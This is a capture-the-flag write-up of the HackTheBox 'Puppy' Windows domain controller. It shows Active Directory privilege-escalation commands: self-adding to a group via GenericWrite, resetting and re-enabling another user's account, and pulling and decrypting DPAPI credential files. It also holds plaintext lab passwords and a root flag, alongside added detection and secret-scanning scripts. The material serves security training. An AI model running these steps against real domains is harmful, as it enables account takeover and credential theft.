Setup
mkdir -p ~/ctf/HackTheBox/puppy/scans; cd ~/ctf/HackTheBox/puppy
IP Address: 10.10.11.70
echo "10.10.11.70 puppy.htb" | sudo tee -a /etc/hosts
10.10.11.70 puppy.htb
Enumeration
nmap -sC -sV -Pn -p- puppy.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 puppy.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-05-21 22:23:04Z)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
2049/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
3260/tcp open iscsi? syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49687/tcp open msrpc syn-ack Microsoft Windows RPC
61145/tcp open msrpc syn-ack Microsoft Windows RPC
61181/tcp open unknown syn-ack
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62785/tcp): CLEAN (Timeout)
| Check 2 (port 47994/tcp): CLEAN (Timeout)
| Check 3 (port 26380/udp): CLEAN (Failed to receive data)
| Check 4 (port 46192/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-05-21T22:24:58
|_ start_date: N/A
|_clock-skew: 6h39m05s
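The port list above is enough to tell what the host is and which listeners do not belong on it. The script below is an added example, not part of the original writeup, that parses nmap -oN port lines, recognises the domain-controller service set, and flags listeners outside that role (here rpcbind, NFS and iSCSI). NMAP_OUTPUT is a constructed excerpt of the scan above, and the DC_PORTS and UNEXPECTED tables are my own assumptions.

```python
import re

# Constructed excerpt of the nmap output above (the full listing is longer).
NMAP_OUTPUT = """\
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP
445/tcp open microsoft-ds? syn-ack
636/tcp open tcpwrapped syn-ack
2049/tcp open nlockmgr syn-ack 1-4 (RPC #100021)
3260/tcp open iscsi? syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
"""

# A port line in -oN output looks like "88/tcp open kerberos-sec syn-ack ...".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

# Ports that together identify an Active Directory domain controller (assumed set).
DC_PORTS = {53, 88, 389, 445, 636, 3268, 9389}
# Services outside a DC's role that enlarge its attack surface (assumed set).
UNEXPECTED = {111: "rpcbind", 2049: "NFS", 3260: "iSCSI"}


def parse_ports(text):
    """Return [(port, proto, service), ...] for every open port in -oN text."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":
            # nmap appends '?' when the service guess is unconfirmed; drop it.
            ports.append((int(m.group(1)), m.group(2), m.group(4).rstrip("?")))
    return ports


def assess(ports):
    """Classify the host and list the exposures a defender should review."""
    open_tcp = {p for p, proto, _ in ports if proto == "tcp"}
    dc_hits = sorted(DC_PORTS & open_tcp)
    return {
        "likely_dc": len(dc_hits) >= 5,
        "dc_ports": dc_hits,
        "winrm": 5985 in open_tcp,  # remote management reachable from the scanner
        "unexpected": {p: UNEXPECTED[p] for p in sorted(UNEXPECTED) if p in open_tcp},
    }


if __name__ == "__main__":
    report = assess(parse_ports(NMAP_OUTPUT))
    print("domain controller:", report["likely_dc"], report["dc_ports"])
    print("WinRM exposed:", report["winrm"])
    for port, name in report["unexpected"].items():
        print(f"review: {name} listening on {port}/tcp")
```

Feed it the scans/nmap file instead of NMAP_OUTPUT to triage the real scan; the header line and script output (`|` lines) are ignored because they never match the port pattern.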
CrackMapExec shows the domain name as puppy.htb. We are provided with the credentials levi.james:KingofAkron2025!, making this an assumed-breach scenario.
Share enumeration finds one DEV share. Since we also have LDAP access, we collect BloodHound data with:
bloodhound-python -d puppy.htb -u "levi.james" -p 'KingofAkron2025!' -ns 10.10.11.70 -c all --zip
In BloodHound we see that levi.james is a member of the HR group, which has GenericWrite on the Developers group.
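The path BloodHound found (levi.james is in HR, HR can write DEVELOPERS) is a membership closure followed by an edge lookup. The script below, added here as an example and not part of the original writeup or of BloodHound, computes that closure over a small constructed edge list. The levi.james/HR/DEVELOPERS edges are the ones the writeup reports; the STAFF, INTERNS, svc_backup and BACKUP_OPS nodes are invented to exercise nested membership and a principal with no path. The audit question a defender asks is the inverse one, "who can modify DEVELOPERS?", which who_can_modify answers.

```python
from collections import deque

# Constructed edge list in BloodHound's (source, relation, target) form.
# levi.james -> HR -> DEVELOPERS is what the box reports; the STAFF/INTERNS
# and svc_backup/BACKUP_OPS edges are invented for the nested and negative cases.
EDGES = [
    ("levi.james", "MemberOf", "HR"),
    ("HR", "GenericWrite", "DEVELOPERS"),
    ("HR", "MemberOf", "STAFF"),
    ("STAFF", "AddMember", "INTERNS"),
    ("svc_backup", "MemberOf", "BACKUP_OPS"),
]

# BloodHound edge types that let the holder change a group's membership.
WRITE_RELATIONS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "AddMember"}


def groups_of(principal, edges=EDGES):
    """Transitive closure of MemberOf: every group the principal belongs to."""
    seen, queue = set(), deque([principal])
    while queue:
        node = queue.popleft()
        for src, rel, dst in edges:
            if src == node and rel == "MemberOf" and dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return seen


def writable_groups(principal, edges=EDGES):
    """Groups the principal can modify, directly or through a group it is in."""
    result = {}
    for holder in [principal, *sorted(groups_of(principal, edges))]:
        for src, rel, dst in edges:
            if src == holder and rel in WRITE_RELATIONS and dst not in result:
                result[dst] = rel if holder == principal else f"{rel} via {holder}"
    return result


def who_can_modify(group, edges=EDGES):
    """Audit view: every principal (user or group) with a write path to group."""
    nodes = {n for src, _, dst in edges for n in (src, dst)}
    return sorted(p for p in nodes if group in writable_groups(p, edges))


if __name__ == "__main__":
    print("levi.james can modify:", writable_groups("levi.james"))
    print("who can modify DEVELOPERS:", who_can_modify("DEVELOPERS"))
```

Run against a real export the edge list would come from the BloodHound JSON; the point here is that any write right held by a group a user is nested in is effectively held by the user, which is why an HR group with GenericWrite on a developer group is a finding on its own.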
Using:
net rpc group addmem "DEVELOPERS" "levi.james" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"
net rpc group members "DEVELOPERS" -U "puppy.htb"/"levi.james"%'KingofAkron2025!' -S "dc.puppy.htb"
levi.james is now a member of DEVELOPERS and we can access the DEV share:
In the DEV share we find a KeePass database (KDBX). We brute-force its master password with keepass4brute:
Opening the KDBX in https://app.keeweb.info/ with the recovered master password gives us:
ant.edwards:A*******
Using:
net rpc password "adam.silver" "Password@123" -U "puppy.htb"/'ant.edwards'%'A*******' -S 10.10.11.70
we reset adam.silver's password. Checking with CrackMapExec, we see the account is disabled:
Using ldapmodify as ant.edwards and feeding the following LDIF on stdin, we change adam.silver's userAccountControl value from 514 (disabled) to 512 (normal user account):
ldapmodify -x -H ldap://10.10.11.70 -D "CN=ANTHONY J. EDWARDS,DC=PUPPY,DC=HTB" -w 'Antman2025!'
dn: CN=ADAM D. SILVER,CN=USERS,DC=PUPPY,DC=HTB
changetype: modify
replace: userAccountControl
userAccountControl: 512
Checking again with CrackMapExec, adam.silver now authenticates; we get WinRM access and the user flag on the Desktop.
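Each step of the chain above (adding a member to DEVELOPERS, resetting adam.silver's password, flipping userAccountControl from 514 to 512) leaves a Security event on the DC: 4728, 4724 and 4722 respectively. The script below is an added example, not part of the original writeup, that decodes the userAccountControl value and runs two detections over a constructed event sample: a group-membership change by a subject outside an admin allow-list (with the self-add case called out), and a password reset followed by an account enable on the same target within a short window. The events, the helpdesk01/jane.doe entries and the GROUP_ADMINS list are constructed; the event IDs and flag bits are standard Windows values.

```python
from datetime import datetime, timedelta

# userAccountControl bit flags (subset) to decode the 514 -> 512 change above.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
}


def decode_uac(value):
    """Names of the flags set in a userAccountControl integer, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


# Constructed Windows Security events (not real log data) with the IDs a DC
# records for the steps above:
#   4728  member added to a security-enabled global group (net rpc group addmem)
#   4724  password reset attempted by another principal (net rpc password)
#   4722  user account enabled (userAccountControl 514 -> 512)
SAMPLE_EVENTS = [
    {"id": 4728, "time": "2025-05-21T22:30:00", "subject": "levi.james",
     "group": "DEVELOPERS", "member": "levi.james"},
    {"id": 4724, "time": "2025-05-21T22:41:10", "subject": "ant.edwards",
     "target": "adam.silver"},
    {"id": 4722, "time": "2025-05-21T22:43:05", "subject": "ant.edwards",
     "target": "adam.silver"},
    # benign: helpdesk resets a password with no enable following it
    {"id": 4724, "time": "2025-05-20T09:00:00", "subject": "helpdesk01",
     "target": "jane.doe"},
]

# Constructed allow-list of accounts expected to manage group membership.
GROUP_ADMINS = {"Administrator", "helpdesk01"}


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect(events, window=timedelta(minutes=30)):
    """Return alert strings for the two patterns in this privilege chain."""
    alerts = []
    # 1. Group membership changed by someone outside the admin allow-list;
    #    a subject adding itself is the GenericWrite abuse seen above.
    for e in events:
        if e["id"] == 4728 and e["subject"] not in GROUP_ADMINS:
            tag = " (self-add)" if e["subject"] == e["member"] else ""
            alerts.append(f"4728: {e['subject']} added {e['member']} to {e['group']}{tag}")
    # 2. Password reset followed by account enable on the same target within
    #    the window: a disabled account being taken over rather than restored.
    resets = [e for e in events if e["id"] == 4724]
    enables = [e for e in events if e["id"] == 4722]
    for r in resets:
        for en in enables:
            if en["target"] == r["target"] and timedelta(0) <= _ts(en) - _ts(r) <= window:
                alerts.append(f"4724+4722: {r['target']} reset by {r['subject']} "
                              f"then enabled by {en['subject']}")
    return alerts


if __name__ == "__main__":
    print("514 =", decode_uac(514), "| 512 =", decode_uac(512))
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

The second rule also catches the ldapmodify route, because the DC logs 4722 on the attribute change regardless of which tool cleared the ACCOUNTDISABLE bit; universal groups log 4756 instead of 4728, so a production rule would match both IDs.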
User Flag
Location: C:\Users\adam.silver\Desktop\user.txt | Flag: b****************************
Privilege Escalation
In the C:\Backups directory we see a zip file; we download and unzip it.
The nms-auth-config.xml.bak file inside it contains the password for steph.cooper:
steph.cooper:Ch*********
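A credential sitting in plaintext in a backed-up config file is the kind of thing a periodic sweep of backup folders and shares should find before an attacker does. The scanner below is an added example, not part of the original writeup, and the SAMPLE_XML it scans is a constructed stand-in for nms-auth-config.xml.bak whose element names and values are invented. It reports credential-looking elements and attributes with the value masked, so the report itself does not become another copy of the secret; the SECRET_NAMES pattern and SUFFIXES list are my own assumptions.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Element/attribute names that usually carry a credential (assumed pattern).
SECRET_NAMES = re.compile(r"(pass(word)?|pwd|secret|token|apikey)$", re.IGNORECASE)
# Backup and config suffixes worth sweeping on shares and backup folders.
SUFFIXES = (".bak", ".xml", ".config", ".old")

# Constructed stand-in for nms-auth-config.xml.bak: the element names and
# values are invented, nothing here is taken from the real file.
SAMPLE_XML = """<?xml version="1.0"?>
<ldap-config>
  <server>dc.puppy.htb</server>
  <bind-dn>CN=STEPH COOPER,CN=USERS,DC=PUPPY,DC=HTB</bind-dn>
  <bind-password>ExamplePlaintext1!</bind-password>
  <service user="svc_nms" password="AnotherExample2!"/>
  <timeout>30</timeout>
</ldap-config>
"""


def mask(value):
    """Keep two characters so a finding can be matched, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 0)


def find_secrets(xml_text, path="<memory>"):
    """Report credential-looking elements and attributes in one XML document."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]  # strip any XML namespace prefix
        if SECRET_NAMES.search(tag) and elem.text and elem.text.strip():
            findings.append({"file": path, "where": f"<{tag}>",
                             "value": mask(elem.text.strip())})
        for attr, val in elem.attrib.items():
            if SECRET_NAMES.search(attr) and val:
                findings.append({"file": path, "where": f"<{tag} {attr}=>",
                                 "value": mask(val)})
    return findings


def scan_tree(root_dir):
    """Walk a backup/share directory and collect findings from matching files."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(SUFFIXES):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(find_secrets(fh.read(), full))
            except ET.ParseError:
                pass  # not XML; a plain regex sweep would go here
    return findings


if __name__ == "__main__":
    # Demonstrate on a throwaway directory holding the constructed sample.
    with tempfile.TemporaryDirectory() as tmp:
        sample = os.path.join(tmp, "nms-auth-config.xml.bak")
        with open(sample, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_XML)
        for f in scan_tree(tmp):
            print(f"{f['file']}: {f['where']} = {f['value']}")
```

Pointing scan_tree at a mounted copy of C:\Backups or the DEV share gives the same kind of finding list; the mitigation is to move such bindings to a managed service account or a secrets store and to keep backups of config files under the same access control as the live files.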
Enumerating with BloodHound and checking with CrackMapExec, we see that steph.cooper can log in using WinRM.
In C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials we find Windows Credential Manager (DPAPI-protected) credential files. Using smbserver we transfer the credential file and the DPAPI master key file to our Linux machine:
smbserver.py share $(pwd) -smb2support
Using impacket-dpapi with steph.cooper's password and SID:
impacket-dpapi masterkey -sid 'S-1-5-21-1487982659-1829050783-2281216199-1107' -password 'Ch*********' -file key_file
we get the decrypted master key.
Using the decrypted master key to decrypt the credential file, we get the password for steph.cooper_adm:
steph.cooper_adm:Fi*******************
Checking with CrackMapExec, we see this user is an administrator.
Root Flag
Location: C:\Users\Administrator\Desktop\root.txt | Flag: 9ad365f27f5d08522e359909f7c26169